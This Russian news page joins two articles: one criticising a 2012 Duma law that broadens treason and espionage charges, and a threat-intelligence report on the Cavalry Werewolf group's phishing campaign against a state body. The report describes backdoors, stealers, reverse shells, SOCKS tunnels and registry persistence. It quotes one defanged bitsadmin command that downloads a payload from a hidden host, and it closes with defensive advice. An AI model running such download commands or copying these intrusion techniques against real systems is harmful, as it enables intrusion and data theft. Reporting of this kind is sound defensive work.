Тайны России защитили скандальным законом

Тайны России защитили скандальным законом

Дума во вторник, 23 октября, приняла сразу во втором и третьем чтении правительственный закон, касающийся уголовного наказания за незаконное получение сведений, составляющих государственную тайну. Теперь срок до 20 лет можно будет получить, к примеру, за оказание "консультационной" помощи иностранцам, работающим с целью нанести ущерб российскому государству. Более того, простое ознакомление с чужими тайнами грозит обернуться для незадачливого гражданина лишением свободы на срок до четырех лет.

Презумпция виновности

Законопроект, внесенный в Госдуму правительством РФ еще в декабре 2008 года, до лета 2012 года пылился в архивах парламента. Но в сентябре 2012 года документ, подготовленный "на основании анализа деятельности органов федеральной службы безопасности", был единогласно принят нижней палатой парламента в первом чтении, в октябре прошел через Думу окончательно (не голосовала за проект лишь "Справедливая Россия", впрочем, не голосовала она и против). Осталось преодолеть кое-какие юридические формальности - рассмотрение в Совете Федерации и подпись президента - и в России появится очередной репрессивный закон, который будет таковым вне зависимости от того, хотели ли с его помощью власти продолжить практику "закручивания гаек" либо же лоббисты из ФСБ просто воспользовались случаем, чтобы подкорректировать устаревшие нормы и облегчить работу своим коллегам, сообщает lenta.ru.

Государство, безусловно, должно бороться с теми, кто передает на сторону секреты, имеющие отношение к безопасности страны. Проблема, однако, в том, что вместе со шпионами в тюрьму зачастую попадают люди, сомнения в виновности которых неоднократно высказывались различными экспертами. Так, в 2000-х на всю страну гремели дела физика Валентина Данилова (попал в тюрьму по обвинению в шпионаже в пользу КНР, хотя его коллеги называли процесс "возмутительным безобразием", а присяжные и вовсе оправдали) и завсектором отдела внешнеполитических исследований Института США и Канады РАН Игоря Сутягина. Последний был обвинен и осужден за передачу спецслужбам США и Великобритании сведений о российских истребителях и ядерном вооружении, которые Сутягин собрал через открытые источники (в 2010 году Сутягин был помилован, и российские власти обменяли его и еще трех человек на десять задержанных в США "русских шпионов").

В 2007 году прокуратура Новосибирской области и вовсе была вынуждена извиниться перед завлабораторией кинетики процессов горения новосибирского Института химической кинетики и горения Сибирского отделения РАН Олегом Коробейничевым. Следователи ФСБ обвинили ученого в публикации секретных сведений о разработках ракетного топлива (работа была выполнена на грант Исследовательского управления армии США), но после проведения экспертизы, признавшей информацию ученого несекретной, дело в отношении Коробейничева было закрыто "за отсутствием состава преступления".

Химика Коробейничева от клейма шпиона спасли коллеги, добившиеся повторной экспертизы по его делу. Сам ученый позднее пояснял, что пострадал из-за квалификации экспертов, привлеченных ФСБ: первую экспертизу его работ поручили военной организации, основным направлением деятельности которой, как выяснилось позднее, была подготовка курсантов. В результате в основу заключения о выдаче гостайны Коробейничевым легли ошибочные утверждения.

Ректор государственного университета - Высшей школы экономики Ярослав Кузьминов в 2007 году в связи с делом Коробейничева отмечал, что значительная часть таких уголовных дел и наносит вред имиджу самой ФСБ, и создает атмосферу шпиономании, так как имеет "оттенок искусственности". Для исправления ситуации Кузьминов предлагал, среди прочего, расширить круг экспертов, которых привлекают в ходе следствия органы, и уточнить понятие гостайны, так как ее критерии "очень размыты, нет однозначных определений, поэтому суды нередко руководствуются 'вкусовыми суждениями'". В ФСБ, впрочем, придерживаются противоположного мнения: сомнения в виновности ряда "шпионов", высказываемые журналистами, неоднократно критиковались сотрудниками органов. В 2011 году, к примеру, генерал-полковник, глава Академии ФСБ Виктор Остроухов в интервью изданию общественного совета при ФСБ утверждал, что реакция российской прессы не всегда учитывает характер и опасность "изменнической деятельности", а российские граждане, осужденные за государственную измену, - "почти всегда профессиональные преступники".

Измена здравому смыслу

До сих пор госизменой считалась "выдача гостайны либо иное оказание помощи иностранному государству, иностранной организации или их представителям в проведении враждебной деятельности в ущерб внешней безопасности РФ". Но еще в 2008 году Александр Игнатьев из общественного совета при ФСБ пояснял, что статью 275 УК необходимо "деидеологизировать", исключив из нее "указание на враждебный по отношению к России" характер преступной деятельности. "В сегодняшней реальности переплетены и внешние, и внутренние угрозы. Следовательно, надо считать государственной изменой угрозу безопасности России", - отмечал эксперт.

Авторы пояснительной записки к законопроекту о госизмене образца 2008 года исходили из похожей логики: в тексте документа говорилось, что действующая редакция статьи 275 УК делает госизмену "крайне сложной для доказывания", а шпионаж и выдача государственной тайны рассматривались не как формы государственной измены, а как разновидности оказания помощи иностранному адресату. А то, сетовали авторы законопроекта, адвокаты подсудимых по этой статье, ссылаясь на недоказанность наличия в их поступках признаков "враждебной" деятельности, стали использовать аргумент "враждебности" в качестве основного для освобождения своих подзащитных от уголовного наказания.

Поправки, которые в 2012 году будут внесены в Уголовный и Уголовно-процессуальный кодексы РФ, не только устраняют из законодательства понятие "враждебной" деятельности, но и предусматривают расширение понятий "государственная измена" и "шпионаж". В частности, теперь госизменой (наказание - до 20 лет лишения свободы) будет считаться выдача иностранному государству, иностранной или "международной организации или их представителям сведений, составляющих гостайну", а также "оказание финансовой, материально-технической, консультационной или иной помощи" иностранным или международным структурам "в деятельности, направленной против безопасности РФ" (статья 275 УК).

В результате внесения поправок в статьи 275 и 276 ("шпионаж"), на смену фразе "в ущерб внешней безопасности РФ" придет другая - "против безопасности России". Как полагает офис уполномоченного по правам человека в РоссииВладимира Лукина, исключение слов "в ущерб внешней безопасности" и замена их на слова "против безопасности" опасно расширяет содержание составов государственной измены и шпионажа. "Данная поправка исключает необходимость доказывания не только такого последствия данных преступлений как причинение ущерба безопасности Российской Федерации, но и самой этой цели", - отмечается в комментарии, размещенном на сайте омбудсмена. Наказуемым же становится предполагаемое намерение совершения противоправных деяний, что "подчеркивает отказ от необходимости доказывания прямого умысла".

Кроме того, новая статья 283.1 предполагает введение санкций вплоть до лишения свободы на срок до четырех лет за получение гостайны "путем похищения, обмана, шантажа, принуждения, угрозы применения насилия" и "иным незаконным способом". То же деяние, если оно было совершено с рядом отягчающих обстоятельств, наказывается лишением свободы на срок от трех до восьми лет. Сделано это было для того, чтобы закрыть возможность распространения секретных сведений по информационным цепочкам, но подобное новшество с легкостью может привести к вольному трактованию слов "иным незаконным способом" следователями и судами.

На этом новации в законодательстве не заканчиваются - в понятие госизмены будет включено крайне спорное положение об оказании помощи международной либо иностранной организации или их представителям в проведении деятельности, направленной против безопасности РФ (до сих пор международные организации не входили в число тех, кому запрещено передавать закрытую информацию). Авторы пояснительной записки к законопроекту в 2008 году уверяли, что "международные организации" должны быть включены в число запрещенных "адресатов" помощи, так как такими организациями "неоднократно предпринимались попытки получения сведений, составляющих государственную тайну, незаконными способами". Однако все та же расплывчатая формулировка содержания понятия "гостайна" ведет к расширительному применению статьи о госизмене: при желании в разряд "помощи" можно записать какую угодно ерунду. И совсем непонятно, что делать человеку в случае, если он собирается оказать консультационные услуги зарубежной организации. Требовать от нее справку, что она не работает в интересах, к примеру, спецслужб США? Или заранее справляться у сотрудников ФСБ, кого еще они собираются причислить к врагам страны?

Глава комитета по гражданскому уголовному арбитражному и процессуальному законодательству Павел Крашенинниковперед вторым чтением пакета поправок обещал, что документы будут исправлены, чтобы не допустить возможность чересчур широкого толкования и связанных с этим злоупотреблений. Но правки вышли косметическими: уполномоченный по правам человека в России Владимир Лукин полагает, что "представленные ко второму чтению поправки к законопроекту не могут изменить оценки законопроекта как противоречащего международно-правовым и конституционным принципам уголовного права".

P.S.

Проблема здесь не просто в самих поправках в УК, формулировки которых оставляют желать лучшего с точки зрения интересов российской юриспруденции. Дело еще и в том, какими установками руководствуются следователи ФСБ, инициируя уголовные дела в отношении "шпионов" по принципу "если и оправдают, то хотя бы насидится так, чтоб другим неповадно было". И еще в том, как дела о госизмене и шпионаже рассматривают представители судебной системы, дискредитированной необъективными приговорами. С принятием поправок, качество которых позорит российских парламентариев, в истории российской шпиономании может открыться новая глава: при желании в изменники родины можно будет записать любого гражданина, поддерживающего связь, к примеру, с западными коллегами. Совершить государственную измену в России теперь будет значительно проще.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

Группировка Cavalry Werewolf взломала сеть госоргана с помощью бэкдоров

В июле 2025 года к специалистам компании «Доктор Веб» обратился клиент из госсектора с жалобой на рассылку подозрительных писем с корпоративного почтового ящика. Расследование показало: перед ними была целевая кампания кибергруппировки, которую аналитики идентифицировали как Cavalry Werewolf.

Цель атаки — сбор конфиденциальной информации и картирование сети для дальнейшего закрепления внутри инфраструктуры.

Начали злоумышленники банально, но эффективно — с фишинга. В качестве «приманки» приходили архивы с паролем и вложенным бэкдором BackDoor.ShellNET.1 (основан на открытом проекте Reverse-Shell-CS). Файлы маскировались под служебные записки и другие официальные документы — имена были соответствующие, чтобы снизить бдительность получателя.

 

После запуска BackDoor.ShellNET.1 атакующие использовали стандартный для Windows инструмент bitsadmin для скачивания дополнительных полезных нагрузок (пример: bitsadmin /transfer www /download hxxp://…/winpot.exe). Среди загруженных модулей оказался стилер Trojan.FileSpyNET.5, который массово тянул документы (.doc/.docx/.xlsx/.pdf), текстовые файлы и изображения. Для скрытого доступа применяли BackDoor.Tunnel.41 (вариант ReverseSocks5) — с его помощью создавались SOCKS5-туннели и обеспечивалось скрытое подключение к заражённому ПК.

Дальше — больше: специалисты «Доктор Веб» обнаружили целый набор инструментов, как собственных, так и основанных на open-source. В арсенале группировки — скриптовые загрузчики (например, BAT.DownLoader.1138), «упакованные» трояны (Trojan.Packed2.49708, Trojan.Siggen31.54011 и т. п.), бэкдоры, управляемые через телеграм-ботов (BackDoor.Siggen2.5463, BackDoor.ShellNET.2), а также прокси-модули типа BackDoor.ReverseProxy.1. Некоторые варианты внедряли полезную нагрузку в легитимные процессы — например, инжектировали данные в aspnet_compiler.exe, чтобы бэкдор выполнялся в контексте доверенного приложения.

 

Интересно, что злоумышленники активно пользуются открытими решениями: либо берут код «как есть», либо модифицируют его под свои нужды. Для доставки следующей волны вредоносов они используют стандартные утилиты — PowerShell, bitsadmin, curl — а для сохранения присутствия в системе модифицируют автозагрузку через реестр (HKCU\...\Run) или ставят исполняемые файлы в C:\users\public\pictures и похожие публичные папки.

Атака Cavalry Werewolf показала типичную для целевых кампаний логику: разведка (whoami, ipconfig, просмотр директорий), проверка прокси и сети, затем загрузка инструментов и закрепление. Также злоумышленники могли позже использовать скомпрометированные устройства для перехода в другие сети — например, при смене работы жертвы — и разворачивать дальнейшие атаки через доверенные каналы.

Отдельные особенности группировки, которые отмечают аналитики «Доктор Веб»: предпочтение к open-source-инструментам, частое использование обратных шеллов и SOCKS-туннелей, внедрение вреда в видимо «безобидные» программы и управление через Telegram API. Фишинговые рассылки имитируют сообщения от государственных органов — это снижает подозрительность целевой аудитории и повышает шансы успешной компрометации.

Рекомендации для организаций — стандартный, но действенный набор мер: усилить фильтрацию почты и блокировку подозрительных вложений, ограничить возможность запуска bitsadmin/PowerShell неподписанных скриптов, включить контроль исполнения (application control) и EDR, регулярно проверять целевые публичные папки, применять многофакторную аутентификацию и оперативно реагировать на подозрительные соединения с неизвестными C2-адресами. При обнаружении инцидента — немедленно изолировать пострадавшие хосты и провести полноценную форензику, чтобы выявить степень компрометации.

Расследование «Доктор Веб» — ещё одно напоминание: даже крупные организации с государственным уровнем защиты уязвимы к грамотному фишингу и тому, что за ним следует. В современных целевых атаках именно сочетание человеческой ошибки и хорошо отлаженных инструментов злоумышленников делает наибольший ущерб.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru